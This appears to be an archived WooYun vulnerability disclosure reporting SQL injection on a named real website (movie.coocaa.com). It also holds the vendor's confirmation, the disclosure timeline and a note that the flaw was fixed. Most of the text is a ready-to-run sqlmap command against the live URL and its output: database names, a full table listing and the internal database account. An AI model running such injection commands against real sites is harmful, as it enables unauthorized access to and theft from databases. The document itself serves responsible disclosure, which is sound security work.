乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-07: 细节已通知厂商并且等待厂商处理中 2015-01-08: 厂商已经确认,细节仅向厂商公开 2015-01-13: 厂商已经修复漏洞并主动公开,细节向公众公开
sqlmap -u "http://movie.coocaa.com/self/pl.php?id=3391750&classid=62" --random-agent --dbs
[*] coocaa_web_new[*] information_schema[*] test
+----------------------------------+| allinfo || ecs_region || movie_black || movie_key || phome_ecms_aippay || phome_ecms_aippay_log || phome_ecms_allinfo || phome_ecms_allinfo_data_1 || phome_ecms_allinfo_doc || phome_ecms_allinfo_doc_data || phome_ecms_application || phome_ecms_application_data_1 || phome_ecms_application_doc || phome_ecms_application_doc_data || phome_ecms_banner_start || phome_ecms_ccpay || phome_ecms_ccpay_data_1 || phome_ecms_ccpay_doc || phome_ecms_ccpay_doc_data || phome_ecms_changepics || phome_ecms_changepics_data_1 || phome_ecms_changepics_doc || phome_ecms_changepics_doc_data || phome_ecms_chong || phome_ecms_chong_data_1 || phome_ecms_chong_doc || phome_ecms_chong_doc_data || phome_ecms_common || phome_ecms_common_data_1 || phome_ecms_common_doc || phome_ecms_common_doc_data || phome_ecms_download || phome_ecms_download_data_1 || phome_ecms_download_doc || phome_ecms_download_doc_data || phome_ecms_dt || phome_ecms_dt_data_1 || phome_ecms_dt_doc || phome_ecms_dt_doc_data || phome_ecms_faq || phome_ecms_faq_data_1 || phome_ecms_faq_doc || phome_ecms_faq_doc_data || phome_ecms_game || phome_ecms_game_data_1 || phome_ecms_game_doc || phome_ecms_game_doc_data || phome_ecms_gstrategy || phome_ecms_gstrategy_data_1 || phome_ecms_gstrategy_doc || phome_ecms_gstrategy_doc_data || phome_ecms_info || phome_ecms_info_data_1 || phome_ecms_info_doc || phome_ecms_info_doc_data || phome_ecms_infoclass_allinfo || phome_ecms_infoclass_application || phome_ecms_infoclass_ccpay || phome_ecms_infoclass_changepics || phome_ecms_infoclass_chong || phome_ecms_infoclass_common || phome_ecms_infoclass_download || phome_ecms_infoclass_dt || phome_ecms_infoclass_faq || phome_ecms_infoclass_game || phome_ecms_infoclass_gstrategy || phome_ecms_infoclass_info || phome_ecms_infoclass_mediapics || phome_ecms_infoclass_message || phome_ecms_infoclass_movie || phome_ecms_infoclass_news || phome_ecms_infoclass_phb || phome_ecms_infoclass_pj || phome_ecms_infoclass_pjdetail || phome_ecms_infoclass_pro || phome_ecms_infoclass_searchword || phome_ecms_infoclass_shop || phome_ecms_infoclass_shopcert || phome_ecms_infoclass_tv || phome_ecms_infoclass_tvfittings || phome_ecms_infoclass_yqlj || phome_ecms_infoclass_yw || phome_ecms_infoclass_zp || phome_ecms_infotmp_allinfo || phome_ecms_infotmp_application || phome_ecms_infotmp_ccpay || phome_ecms_infotmp_changepics || phome_ecms_infotmp_chong || phome_ecms_infotmp_common || phome_ecms_infotmp_download || phome_ecms_infotmp_dt || phome_ecms_infotmp_faq || phome_ecms_infotmp_game || phome_ecms_infotmp_gstrategy || phome_ecms_infotmp_info || phome_ecms_infotmp_mediapics || phome_ecms_infotmp_message || phome_ecms_infotmp_movie || phome_ecms_infotmp_news || phome_ecms_infotmp_phb || phome_ecms_infotmp_pj || phome_ecms_infotmp_pjdetail || phome_ecms_infotmp_pro || phome_ecms_infotmp_searchword || phome_ecms_infotmp_shop || phome_ecms_infotmp_shopcert || phome_ecms_infotmp_tv || phome_ecms_infotmp_yqlj || phome_ecms_infotmp_zp || phome_ecms_mediapics || phome_ecms_mediapics_data_1 || phome_ecms_mediapics_doc || phome_ecms_mediapics_doc_data || phome_ecms_message || phome_ecms_message_data_1 || phome_ecms_message_doc || phome_ecms_message_doc_data || phome_ecms_movie || phome_ecms_movie_data_1 || phome_ecms_movie_doc || phome_ecms_movie_doc_data || phome_ecms_news || phome_ecms_news_data_1 || phome_ecms_news_doc || phome_ecms_news_doc_data || phome_ecms_phb || phome_ecms_phb_data_1 || phome_ecms_phb_doc || phome_ecms_phb_doc_data || phome_ecms_pj || phome_ecms_pj_data_1 || phome_ecms_pj_doc || phome_ecms_pj_doc_data || phome_ecms_pjdetail || phome_ecms_pjdetail_data_1 || phome_ecms_pjdetail_doc || phome_ecms_pjdetail_doc_data || phome_ecms_pro || phome_ecms_pro_data_1 || phome_ecms_pro_doc || phome_ecms_pro_doc_data || phome_ecms_searchword || phome_ecms_searchword_data_1 || phome_ecms_searchword_doc || phome_ecms_searchword_doc_data || phome_ecms_shop || phome_ecms_shop_data_1 || phome_ecms_shop_doc || phome_ecms_shop_doc_data || phome_ecms_shopcert || phome_ecms_shopcert_data_1 || phome_ecms_shopcert_doc || phome_ecms_shopcert_doc_data || phome_ecms_tv || phome_ecms_tv_data_1 || phome_ecms_tv_doc || phome_ecms_tv_doc_data || phome_ecms_yqlj || phome_ecms_yqlj_data_1 || phome_ecms_yqlj_doc || phome_ecms_yqlj_doc_data || phome_ecms_zmhs || phome_ecms_zp || phome_ecms_zp_data_1 || phome_ecms_zp_doc || phome_ecms_zp_doc_data || phome_enewsad || phome_enewsadclass || phome_enewsadminstyle || phome_enewsbefrom || phome_enewsbq || phome_enewsbqclass || phome_enewsbqtemp || phome_enewsbqtempclass || phome_enewsbuybak || phome_enewsbuygroup || phome_enewscard || phome_enewsclass || phome_enewsclassadd || phome_enewsclassf || phome_enewsclasstemp || phome_enewsclasstempclass || phome_enewsdiggips || phome_enewsdo || phome_enewsdolog || phome_enewsdownerror || phome_enewsdownrecord || phome_enewsdownurlqz || phome_enewserrorclass || phome_enewsf || phome_enewsfava || phome_enewsfavaclass || phome_enewsfeedback || phome_enewsfeedbackclass || phome_enewsfeedbackf || phome_enewsfile || phome_enewsgbook || phome_enewsgbookclass || phome_enewsgfenip || phome_enewsgroup || phome_enewshy || phome_enewshyclass || phome_enewsindexpage || phome_enewsinfoclass || phome_enewsinfotype || phome_enewsinfovote || phome_enewsjstemp || phome_enewsjstempclass || phome_enewskey || phome_enewslink || phome_enewslinkclass || phome_enewslinktmp || phome_enewslisttemp || phome_enewslisttempclass || phome_enewslog || phome_enewsloginfail || phome_enewsmember || phome_enewsmemberadd || phome_enewsmemberf || phome_enewsmemberfeedback || phome_enewsmemberform || phome_enewsmembergbook || phome_enewsmembergroup || phome_enewsmenu || phome_enewsmenuclass || phome_enewsmod || phome_enewsnewstemp || phome_enewsnewstempclass || phome_enewsnotcj || phome_enewspage || phome_enewspageclass || phome_enewspagetemp || phome_enewspayapi || phome_enewspayrecord || phome_enewspic || phome_enewspicclass || phome_enewspl || phome_enewspl_data_1 || phome_enewsplayer || phome_enewsplf || phome_enewspltemp || phome_enewspostdata || phome_enewspostserver || phome_enewsprinttemp || phome_enewspublic || phome_enewspubtemp || phome_enewspubvar || phome_enewspubvarclass || phome_enewsqmsg || phome_enewssearch || phome_enewssearchall || phome_enewssearchall_load || phome_enewssearchtemp || phome_enewssearchtempclass || phome_enewsshopdd || phome_enewsshoppayfs || phome_enewsshopps || phome_enewssp || phome_enewssp_1 || phome_enewssp_2 || phome_enewssp_3 || phome_enewssp_3_bak || phome_enewsspacestyle || phome_enewsspclass || phome_enewssql || phome_enewstable || phome_enewstags || phome_enewstagsclass || phome_enewstagsdata || phome_enewstask || phome_enewstempbak || phome_enewstempgroup || phome_enewstempvar || phome_enewstempvarclass || phome_enewstogzts || phome_enewsuser || phome_enewsuseradd || phome_enewsuserclass || phome_enewsuserjs || phome_enewsuserlist || phome_enewsvote || phome_enewsvotemod || phome_enewsvotetemp || phome_enewswapstyle || phome_enewswfinfo || phome_enewswfinfolog || phome_enewswords || phome_enewsworkflow || phome_enewsworkflowitem || phome_enewswriter || phome_enewsyh || phome_enewszt || phome_enewsztadd || phome_enewsztclass || phome_enewsztf || phome_pc_zmhs || res_imagedetail || res_movieinfo || res_resourceinfo || vrm_cpmovieinfo || winners_award || yzdd_excel || yzdd_result || yzdd_result_all || yzdd_result_glass || yzdd_result_info || yzdd_user |+----------------------------------+
[*] 'web'@'192.168.0.52'
危害等级:高
漏洞Rank:20
确认时间:2015-01-08 11:43
多谢。马上进行修复。
2015-01-13:已修复